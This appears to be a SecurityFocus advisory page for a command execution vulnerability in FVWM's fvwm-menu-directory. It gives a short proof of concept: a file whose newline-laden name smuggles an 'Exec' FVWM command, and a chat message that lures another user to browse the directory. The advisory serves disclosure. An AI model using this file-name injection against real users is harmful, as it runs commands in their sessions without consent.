info
discussion
exploit
solution
references
FVWM fvwm-menu-directory Command Execution Vulnerability
The following proof of concept has been provided:
$ touch '
> Exec xmessage "0wn3d"
>
> '
$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111"
Privacy Statement
Copyright 2010, SecurityFocus